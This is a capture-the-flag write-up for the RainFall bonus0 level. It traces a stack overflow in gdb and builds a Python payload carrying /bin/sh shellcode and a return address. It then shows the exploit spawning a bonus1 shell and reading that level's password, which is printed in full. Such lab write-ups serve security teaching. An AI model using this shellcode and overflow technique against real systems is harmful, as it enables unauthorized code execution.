62 lines
2.7 KiB
Plaintext
62 lines
2.7 KiB
Plaintext
The program segfault when 2nd string is 20 char longs
|
||
|
||
|
||
```
|
||
Starting program: /home/user/bonus0/bonus0
|
||
-
|
||
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
||
-
|
||
AAAABBBBCXXXXDDDEEEE
|
||
aaaaaaaaaaaaaaaaaaaaAAAABBBBCXXXXDDDEEEE<EFBFBD><EFBFBD><EFBFBD> AAAABBBBCXXXXDDDEEEE<45><45><EFBFBD>
|
||
|
||
Program received signal SIGSEGV, Segmentation fault.
|
||
0x58585858 in ?? ()
|
||
```
|
||
|
||
we need to find where our 'a's are stored in the stack, each call to p reads so we will stop after the 1st and proceed to do a search.
|
||
|
||
It doesn't work, only thing we can find are a string of 20 'a's near eax.
|
||
|
||
We can see there is a strcpy just after both calls to p, and p writes to the same address, so maybe we can do something with that, considering the second string will override the first.
|
||
|
||
Still doesn't work, maybe check read's return in p function ?
|
||
|
||
Got it at 0xbfffe680, let's leave the function and check if the data's still there
|
||
|
||
during second read call, we see our data is still there, but the beginning have been override by our second string. Maybe we can ditch the first string entirely ?
|
||
|
||
let's try putting our shell code 3 characters after the 'X's and replace the 'X's with 0xbfffe690
|
||
|
||
```
|
||
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
|
||
File "<string>", line 1
|
||
print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')
|
||
^
|
||
SyntaxError: invalid syntax
|
||
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf'+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
|
||
bonus0@RainFall:~$ echo "a" > 1.txt
|
||
bonus0@RainFall:~$ (cat 1.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
|
||
-
|
||
-
|
||
a AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
|
||
whoami
|
||
bonus0@RainFall:~$
|
||
```
|
||
|
||
It's doesn't work with an empty first file, let's just put it twice so we don't have to worry about strings overriding or something.
|
||
Notice we use the full path of the binary to avoid the need for a NOP slide.
|
||
|
||
|
||
```
|
||
bonus0@RainFall:~$ (cat test.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
|
||
-
|
||
-
|
||
AAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>FAAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>F<EFBFBD><EFBFBD><EFBFBD> AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
|
||
whoami
|
||
bonus1
|
||
cat /home/user/bonus1/.pass
|
||
cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
|
||
```
|
||
|
||
:)
|